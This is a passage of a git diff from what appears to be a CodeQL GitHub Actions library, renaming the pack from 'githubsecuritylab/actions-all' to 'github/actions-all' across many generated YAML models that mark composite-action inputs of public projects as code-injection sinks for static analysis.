b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 9ca004a7c15..519adffb097 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index fc3870d89a8..69d0355d720 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 1d621562771..97a69439375 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index f09b364127e..54e557061df 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index 56e7b814231..12ed97f6af5 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 9f953b32ab1..2c64a6978af 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index 257b77bc2c3..f7982d2244a 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index 49f2f86907f..9678f320425 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index 1e33c5e540a..2ee43fbcf6c 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index cfbf15549c4..2560e80f52c 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 24730af3d77..17e4f893d39 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index 6be5abd09dd..dde14bfa277 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 145b6f0d0e3..0aabf2e1d7f 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index c8b05bfd904..6fdfb2e6eba 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index 04c218a76c1..b068e810823 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 5447d4b7e2e..9107fd9e85c 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index 825ce27511d..ee81ae11045 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index 8f3e49c9768..a8030627789 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index 1937367debc..a89b000bedf 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index 01b77b7ccc6..a98ea12496f 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index edbd28d401b..8475ef34240 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index 4b31bd66c5a..fff5eaab1f4 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index a186fa070b0..5d0cef62b0b 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 92ee2971e3a..3edfa5ef14d 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index 07b8e96bfe2..d5f640e91a5 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 2a2a5baab45..32945cb21e3 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 274fab01e92..42eeca98de4 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index 3671de9e58a..5c0777ce394 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index 2ef34dac8ba..ac777af0285 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index d76f20031e7..26a587e4f5c 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index eccb5dae2bd..a26ebcfa57d 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index 3cbd3330ccd..bf39b24e841 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index 73c9c1f24a2..00cb4906bb5 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index 90c4f699308..85f583a5e88 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index ed4e8820c99..207b5705e51 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index df51b9fe4c8..f0f3be91b4b 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 8fca8591ceb..04e779b9579 100644 --- a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml +++ b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["simple-icons/simple-icons", "*", "input.issue_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml index 819728cf718..7939469934e 100644 --- a/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml +++ b/ql/lib/ext/generated/composite-actions/slint-ui_slint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["slint-ui/slint", "*", "input.extra-packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml index d3eaca780b4..1af5c9435af 100644 --- a/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml +++ b/ql/lib/ext/generated/composite-actions/solidusio_solidus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["solidusio/solidus", "*", "input.last_minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml index 42c00ea216b..bcb9dc853d6 100644 --- a/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml +++ b/ql/lib/ext/generated/composite-actions/solo-io_gloo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["solo-io/gloo", "*", "input.base-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml index a93d6a039d4..ec5b1a4e50c 100644 --- a/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonarr_sonarr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr", "*", "input.filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml index 8a7784a6f01..2f0bb66127b 100644 --- a/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml +++ b/ql/lib/ext/generated/composite-actions/sonic-pi-net_sonic-pi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sonic-pi-net/sonic-pi", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml index 1b22d43bfad..65953f0387a 100644 --- a/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml +++ b/ql/lib/ext/generated/composite-actions/spacedriveapp_spacedrive.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spacedriveapp/spacedrive", "*", "input.setup-arg", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml index 7175dd9450b..035e331a007 100644 --- a/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml +++ b/ql/lib/ext/generated/composite-actions/spockframework_spock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spockframework/spock", "*", "input.additional-java-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml index dca0f00a4ec..1cf431a7573 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_initializr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-io/initializr", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml index 5f75d4fd0cd..669d7f443b1 100644 --- a/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-io_start.spring.io.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-io/start.spring.io", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml index d34a6a1a388..b53f0949903 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-boot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-boot", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml index b7c5f7e214c..4e9af4a1a8e 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-framework", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml index eead3b5ace3..3fd31a3612f 100644 --- a/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml +++ b/ql/lib/ext/generated/composite-actions/spring-projects_spring-graphql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["spring-projects/spring-graphql", "*", "input.run-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml index be7043cfdbf..090bf1afc85 100644 --- a/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml +++ b/ql/lib/ext/generated/composite-actions/square_workflow-kotlin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["square/workflow-kotlin", "*", "input.commit-message", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml index 36bdef9ad9a..47afbc44f76 100644 --- a/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml +++ b/ql/lib/ext/generated/composite-actions/stefanprodan_podinfo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stefanprodan/podinfo", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml index 3d66b07df9f..4e173c717e5 100644 --- a/ql/lib/ext/generated/composite-actions/stellar_go.model.yml +++ b/ql/lib/ext/generated/composite-actions/stellar_go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["stellar/go", "*", "input.go-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml index 2f8a3fbdfa6..8091471b3c0 100644 --- a/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/composite-actions/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell", "*", "input.name", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell", "*", "input.value", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml index e1acb54c724..a3b3a5624c1 100644 --- a/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml +++ b/ql/lib/ext/generated/composite-actions/subquery_subql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["subquery/subql", "*", "input.package-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml index 0a51c708799..22264f3f29f 100644 --- a/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml +++ b/ql/lib/ext/generated/composite-actions/swagger-api_swagger-codegen.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["swagger-api/swagger-codegen", "*", "input.options", "code-injection", "generated"] diff --git 